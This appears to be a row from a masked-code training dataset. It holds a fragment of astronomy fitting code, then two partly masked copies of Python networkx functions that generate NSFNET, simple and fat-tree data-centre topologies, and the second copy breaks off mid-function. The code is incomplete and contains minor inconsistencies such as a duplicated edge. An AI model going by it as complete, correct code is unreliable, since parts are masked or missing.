p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
comp.parameters.add_many(p2)
params.add_many(p2)
componentslist.append(comp)
if (comp.name == 'psfwing'):
#psfwing_02pxscale_datatab = readEllipseOutput('PSFtinytim_centered_resc_linscale05px.ell')
psfwing_02pxscale_datatab = readEllipseOutput('star_02pxscale.ell')
psfwing_02pxscale_datatab['sma'] = psfwing_02pxscale_datatab['sma'] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_02pxscale_datatab['sma'] = psfwing_02pxscale_datatab['sma'] * np.sqrt(1 - psfwing_02pxscale_datatab['ellip'])
#if minorAxisFit:
# psfwing_02pxscale_datatab['sma'] = psfwing_02pxscale_datatab['sma'] * (1 - psfwing_02pxscale_datatab['ellip'])
psfwing_02pxscale_datatab['intens'] = psfwing_02pxscale_datatab['intens'] / Settings.pxlToArcsec**2
psfwing_02pxscale_datatab['intens'] = psfwing_02pxscale_datatab['intens'] / max(psfwing_02pxscale_datatab['intens'])
#psfwing_logscale_datatab = readEllipseOutput('PSFtinytim_centered_resc_logscale.ell')
psfwing_logscale_datatab = readEllipseOutput('star_logscale.ell')
psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab['sma'] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab['sma'] * np.sqrt(1 - psfwing_logscale_datatab['ellip'])
#if minorAxisFit:
# psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab['sma'] * (1 - psfwing_logscale_datatab['ellip'])
psfwing_logscale_datatab['intens'] = psfwing_logscale_datatab['intens'] / Settings.pxlToArcsec**2
psfwing_logscale_datatab['intens'] = psfwing_logscale_datatab['intens'] / max(psfwing_logscale_datatab['intens'])
return componentslist, params, psfwing_02pxscale_datatab, psfwing_logscale_datatab
| null | [
0,
1,
2,
3
] |
651 | 4cf2829282cb0a1673e741f78f17ce27a2817ff2 | <mask token>
def gen_arbitrary_network(num_eps, ep_label=None, ep_capacity=12500,
num_channels=1, racks_dict=None, topology_type=None):
"""Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
    indexing purposes when using the Demand class. This is useful when you want
    to use the Demand class but do not need a carefully crafted networkx
    graph that accurately mimics the network you will use for the demands.
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
        ep_capacity (int, float): Byte capacity per end point channel.
        num_channels (int, float): Number of channels on each link in network.
        racks_dict (dict): Mapping of which end points are in which racks. Keys are
            rack ids, values are lists of end points. If None, assume there is no
            clustering/rack system in the network grouping different end points
            into different clusters/racks.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
servers = [str(i) for i in range(num_eps)]
else:
servers = [(ep_label + '_' + str(i)) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),
servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
eps.append(node)
network.graph['endpoints'] = eps
max_nw_capacity = num_eps * ep_capacity * num_channels / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(
num_eps, ep_capacity, num_channels)
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=ep_capacity * num_channels, endpoint_label=
ep_label, node_labels=[ep_label], racks_dict=racks_dict,
topology_type=topology_type)
return network
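# Usage sketch (illustrative, not from the original sample): an edgeless
# 4-endpoint network used purely for endpoint-name indexing.
#
#     >>> net = gen_arbitrary_network(num_eps=4, ep_label='server')
#     >>> net.graph['endpoints']
#     ['server_0', 'server_1', 'server_2', 'server_3']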
def gen_nsfnet_network(ep_label='server', rack_label='rack', N=0,
num_channels=2, server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10, show_fig=False):
"""Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0, 1], [0, 3], [0, 2], [1, 2], [1, 7], [3, 8], [3, 4
], [3, 6], [4, 5], [4, 5], [5, 2], [5, 13], [5, 12], [6, 7], [7, 10
], [8, 11], [8, 9], [9, 10], [9, 12], [10, 11], [10, 13], [11, 12]]
if N == 0:
label = ep_label
else:
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
racks_dict = None
else:
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label + '_' + str(i))
network.add_edge(ep_label + '_' + str(i), rack_label + '_' +
str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
rack_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * rack_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet', racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
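# Usage sketch (illustrative): with N=0 every one of the 14 NSFNET nodes is
# itself an endpoint.
#
#     >>> nsf = gen_nsfnet_network(N=0)
#     >>> len(nsf.graph['endpoints'])
#     14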
def gen_simple_network(ep_label='server', num_channels=2,
server_to_rack_channel_capacity=500, show_fig=False):
"""Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
        server_to_rack_channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0, 1), (0, 2), (1, 2), (2, 4), (4, 3), (3, 1)],
weight=1)
servers = [(ep_label + '_' + str(i)) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5), servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
server_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * server_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label], topology_type=
'5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
"""Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
"""
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4, L=2, n=4, ep_label='server', rack_label='rack',
edge_label='edge', aggregate_label='agg', core_label='core',
num_channels=2, server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000, edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000, rack_to_core_channel_capacity=2000,
show_fig=False):
"""Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
        n (int): Number of servers per rack.
        ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
        edge_label (str,int): Label to assign to edge switch nodes
        aggregate_label (str,int): Label to assign to aggregate switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
        server_to_rack_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
"""
if L != 2 and L != 4:
raise Exception(
'L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'
.format(L))
if k % 2 != 0:
raise Exception(
'k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'
.format(k))
channel_names = gen_channel_names(num_channels)
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label,
core_label]
num_cores = int((k / 2) ** (L / 2))
num_aggs = int(k ** 2 / 2)
num_edges = int(k ** 2 / 2)
num_pods = int(2 * (k / 2) ** (L - 2))
num_racks = int(2 * (k / 2) ** (L - 1))
num_servers = int(num_racks * n)
cores = [(core_label + '_' + str(i)) for i in range(num_cores)]
aggs = [(aggregate_label + '_' + str(i)) for i in range(num_aggs)]
edges = [(edge_label + '_' + str(i)) for i in range(num_edges)]
racks = [(rack_label + '_' + str(i)) for i in range(num_racks)]
servers = [(ep_label + '_' + str(i)) for i in range(num_servers)]
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
for up_port in range(int(k / 2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network, (rack, core),
channel_names, rack_to_core_channel_capacity)
else:
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + k / 2)
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
pod_labels = [('pod_' + str(i)) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = 'pod_' + str(pod_iter),
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key], (pod_agg,
pod_edge), channel_names, edge_to_agg_channel_capacity)
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[
pod_iter])
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network, (core,
pod_agg), channel_names, agg_to_core_channel_capacity)
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network, (pod_edge,
rack), channel_names, rack_to_edge_channel_capacity)
racks_dict = {rack: [] for rack in racks}
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network, (rack, server),
channel_names, server_to_rack_channel_capacity)
racks_dict[rack].append(server)
max_nw_capacity = (num_servers * num_channels *
server_to_rack_channel_capacity / 2)
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network, max_nw_capacity,
num_channels, ep_link_capacity=server_to_rack_channel_capacity *
num_channels, endpoint_label=ep_label, node_labels=node_labels,
topology_type='fat_tree', racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
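# Worked check (illustrative) of the sizing equations quoted in the
# gen_fat_tree docstring, for k=4, L=4, n=4:
#   cores = (k/2)^(L/2) = 4; edges = aggs = (k^2)/2 = 8;
#   racks = 2*(k/2)^(L-1) = 16; servers = racks * n = 64.
#
#     >>> ft = gen_fat_tree(k=4, L=4, n=4)
#     >>> len(ft.graph['endpoints'])
#     64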
def init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity, endpoint_label='server', topology_type='unknown',
node_labels=['server'], racks_dict=None):
"""Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
            assume there is no rack system grouping multiple servers into one
            rack.
"""
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
<mask token>
def add_edge_capacity_attrs(network, edge, channel_names, channel_capacity,
bidirectional_links=True):
"""Adds channels and corresponding max channel bytes to single edge in network.
Args:
        network (networkx graph): Network containing edges to which attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}}}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network, edges, channel_names,
channel_capacity, bidirectional_links=True):
"""Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
    or network[0][1]['1_to_0_port']['channels']['channel_1'] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}} for edge in edges}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity} for
edge in edges}
nx.set_edge_attributes(network, attrs)
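# Access-pattern sketch matching the docstring above (illustrative; the exact
# channel name depends on the masked gen_channel_names helper):
#
#     >>> g = nx.Graph(); g.add_edge('a', 'b')
#     >>> add_edges_capacity_attrs(g, [('a', 'b')], gen_channel_names(1), 500)
#     >>> g['a']['b']['a_to_b_port']['max_channel_capacity']
#     250.0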
def get_node_type_dict(network, node_types=[]):
"""Gets dict where keys are node types, values are list of nodes for each node type in graph."""
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
pass
return network_nodes_dict
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
"""Gets networkx positions of nodes in fat tree network for plotting."""
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {}
widths = {}
h = iter([1, 2, 3, 4, 5])
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1 / (len(node_type_dict[node_type]) + 1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = (idx + 1) * widths[node_type] * width_scale, heights[
node_type] * height_scale
idx += 1
return pos
<mask token>
def plot_network(network, draw_node_labels=True, ep_label='server',
network_node_size=2000, font_size=30, linewidths=1, fig_scale=2,
path_to_save=None, show_fig=False):
"""Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
        font_size (int,float): Size of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
        matplotlib.figure.Figure: the plotted network figure.
"""
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15 * fig_scale, 15 * fig_scale])
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph[
'node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']
)
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network, pos, nodelist=network_nodes_dict[
node_type], node_size=network_node_size, node_color=next(
node_colours), linewidths=linewidths, label=node_type)
if draw_node_labels:
nx.draw_networkx_labels(network, pos, font_size=font_size,
font_color='k', font_family='sans-serif', font_weight='normal',
alpha=1.0)
fibre_links = list(network.edges)
nx.draw_networkx_edges(network, pos, edgelist=fibre_links, edge_color=
'k', width=3, label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
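# Rendering sketch (illustrative): non-fat-tree topologies are laid out via
# graphviz 'neato', so this assumes pygraphviz is installed.
#
#     >>> fig = plot_network(gen_simple_network(), show_fig=False)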
<mask token>
| <mask token>
def gen_arbitrary_network(num_eps, ep_label=None, ep_capacity=12500,
num_channels=1, racks_dict=None, topology_type=None):
"""Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
    indexing purposes when using the Demand class. This is useful when you want
    to use the Demand class but do not need a carefully crafted networkx
    graph that accurately mimics the network you will use for the demands.
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
        ep_capacity (int, float): Byte capacity per end point channel.
        num_channels (int, float): Number of channels on each link in network.
        racks_dict (dict): Mapping of which end points are in which racks. Keys are
            rack ids, values are lists of end points. If None, assume there is no
            clustering/rack system in the network grouping different end points
            into different clusters/racks.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
servers = [str(i) for i in range(num_eps)]
else:
servers = [(ep_label + '_' + str(i)) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),
servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
eps.append(node)
network.graph['endpoints'] = eps
max_nw_capacity = num_eps * ep_capacity * num_channels / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(
num_eps, ep_capacity, num_channels)
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=ep_capacity * num_channels, endpoint_label=
ep_label, node_labels=[ep_label], racks_dict=racks_dict,
topology_type=topology_type)
return network
def gen_nsfnet_network(ep_label='server', rack_label='rack', N=0,
num_channels=2, server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10, show_fig=False):
"""Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0, 1], [0, 3], [0, 2], [1, 2], [1, 7], [3, 8], [3, 4
], [3, 6], [4, 5], [4, 5], [5, 2], [5, 13], [5, 12], [6, 7], [7, 10
], [8, 11], [8, 9], [9, 10], [9, 12], [10, 11], [10, 13], [11, 12]]
if N == 0:
label = ep_label
else:
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
racks_dict = None
else:
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label + '_' + str(i))
network.add_edge(ep_label + '_' + str(i), rack_label + '_' +
str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
rack_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * rack_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet', racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
def gen_simple_network(ep_label='server', num_channels=2,
server_to_rack_channel_capacity=500, show_fig=False):
"""Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
        server_to_rack_channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0, 1), (0, 2), (1, 2), (2, 4), (4, 3), (3, 1)],
weight=1)
servers = [(ep_label + '_' + str(i)) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5), servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
server_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * server_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label], topology_type=
'5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
"""Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
"""
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4, L=2, n=4, ep_label='server', rack_label='rack',
edge_label='edge', aggregate_label='agg', core_label='core',
num_channels=2, server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000, edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000, rack_to_core_channel_capacity=2000,
show_fig=False):
"""Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
        n (int): Number of servers per rack.
        ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
            ep_label prepended to their label (e.g. 'server_0', 'server_1', ...).
        edge_label (str,int): Label to assign to edge switch nodes
        aggregate_label (str,int): Label to assign to aggregate switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
        server_to_rack_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
"""
if L != 2 and L != 4:
raise Exception(
'L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'
.format(L))
if k % 2 != 0:
raise Exception(
'k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'
.format(k))
channel_names = gen_channel_names(num_channels)
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label,
core_label]
num_cores = int((k / 2) ** (L / 2))
num_aggs = int(k ** 2 / 2)
num_edges = int(k ** 2 / 2)
num_pods = int(2 * (k / 2) ** (L - 2))
num_racks = int(2 * (k / 2) ** (L - 1))
num_servers = int(num_racks * n)
cores = [(core_label + '_' + str(i)) for i in range(num_cores)]
aggs = [(aggregate_label + '_' + str(i)) for i in range(num_aggs)]
edges = [(edge_label + '_' + str(i)) for i in range(num_edges)]
racks = [(rack_label + '_' + str(i)) for i in range(num_racks)]
